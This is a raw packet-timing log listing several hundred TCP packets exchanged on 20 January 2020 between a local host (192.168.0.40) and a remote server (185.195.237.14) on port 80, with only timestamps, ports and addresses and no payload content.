Jan 20, 2020 14:13:55.424525976 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.424609900 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.424611092 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.424688101 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.424777985 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.424784899 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.424793959 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.424823046 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.424896002 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.424962044 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.424979925 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.424998999 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.425087929 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.425122976 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.425244093 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.425297976 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.425314903 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.425335884 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.425410986 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.425414085 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.425434113 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.425496101 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.425554991 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.425589085 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.425673008 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.425685883 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.425700903 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.425806999 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.425966024 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.426055908 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.426090002 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.426090956 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.426112890 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.426177979 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.426218987 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.426235914 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.426256895 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.426263094 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.426338911 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.426422119 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.426429033 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.426445961 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.426542044 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.426578999 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.426619053 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.426635981 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.426692009 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.426789999 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.426837921 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.426959038 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.427064896 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427102089 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427115917 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427175045 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427175999 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.427279949 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427282095 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.427299023 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427352905 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.427408934 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427445889 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.427454948 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427527905 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.427570105 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427586079 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427613974 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.427699089 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.427700996 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427822113 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.427828074 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427844048 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427946091 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.427947044 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.428065062 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.428105116 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.428121090 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.428229094 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.428261042 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.428294897 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.428308964 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.428371906 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.428478956 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.442547083 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.472620010 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.472623110 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.472625017 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.472625971 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.472628117 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.472629070 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473109007 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473114014 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473115921 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473117113 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473119020 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473119974 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473120928 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473123074 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473124027 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473359108 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473378897 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473404884 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473536015 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473572016 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473584890 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473701954 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473830938 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473855972 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.473970890 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.474092960 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.474114895 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.474168062 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.474267960 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.474309921 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.474335909 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.474443913 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.474462032 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.474468946 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.474585056 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.474602938 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.474628925 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.474853992 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.475925922 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.490446091 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.490514040 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.490535021 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.490550995 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.490679026 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.490717888 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.491156101 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.491178036 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.491197109 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.491211891 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.491296053 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.491323948 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.491430998 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.491545916 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.491575003 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.491590023 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.491641045 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.491653919 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.491811991 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.491883039 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.491910934 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.491928101 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.492038965 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.492048025 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.492156029 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.492161989 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.492177963 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.492229939 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.492244005 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.492294073 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.492358923 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.492382050 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.492474079 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.492475033 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.492626905 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.492640972 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.492660999 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.492758036 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.492775917 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.492875099 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.493037939 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.493141890 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.493151903 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.493216038 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.493244886 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.493258953 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.493297100 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.493351936 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.493396997 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.493482113 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.493504047 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.493623018 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.493652105 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.493670940 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.493732929 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.493796110 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.493849993 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.493949890 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.493963003 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.493968010 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.494067907 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.494077921 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.521719933 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.521924973 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.521996975 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.522023916 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.522053957 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.522084951 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.522289991 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.522304058 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.522485971 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.522511959 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.522542000 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.522562981 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.522680044 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.522691965 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.522815943 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.522833109 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.522872925 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.523139000 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.524086952 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.524120092 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.524236917 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.524337053 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.524346113 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.524369955 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.524388075 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.524507046 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.524535894 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.524600983 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.524672985 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.524729967 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.524763107 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.524852991 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.524874926 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.524905920 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.524935007 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.525007010 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.525069952 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.525105000 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.525121927 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.525199890 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.525305033 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.525317907 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.525331974 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.525453091 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.525456905 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.525475979 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.525583029 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.525588036 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.525703907 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.525710106 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.525721073 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.525834084 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.529239893 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.539339066 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.539530993 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.539555073 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.539570093 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.539679050 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.539738894 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.539758921 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.539783955 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.539890051 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.539910078 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.539983988 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.540081978 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.540086985 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.540117979 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.540132046 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.540220022 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.540319920 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.540348053 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.540350914 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.540453911 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.540486097 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.540532112 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.540616035 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.540623903 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.540649891 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.540739059 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.540775061 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.540910959 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.540916920 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.540940046 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.541022062 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.541085958 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.541104078 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.541141033 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.541204929 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.541254044 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.541311026 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.541424036 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.541428089 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.541502953 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.541538954 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.541553020 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.541589975 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.541650057 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.541678905 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.541764975 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.541785955 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.541907072 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.541910887 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.541924953 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.542028904 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.542037964 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.542078972 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.542188883 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.542201996 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.542296886 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.542311907 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.542407990 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.542422056 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.542424917 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.542537928 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.542541027 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.542649984 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.542664051 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.542764902 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.542778015 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.542880058 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.542887926 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.542895079 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.543004036 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.543080091 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.543102026 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.543186903 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.543206930 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.543309927 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.543311119 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.543325901 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.543427944 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.543436050 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.543545008 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.543550014 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.543658972 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.543766975 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.543768883 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.543786049 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.543849945 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.543894053 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.543960094 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.544051886 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.544079065 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.544186115 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.544222116 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.544236898 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.544262886 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.544358015 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.544380903 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.544466972 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.544507980 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.544569016 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.544641018 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.544707060 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.544722080 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.544783115 CET	49186	80	192.168.0.40	185.195.237.14
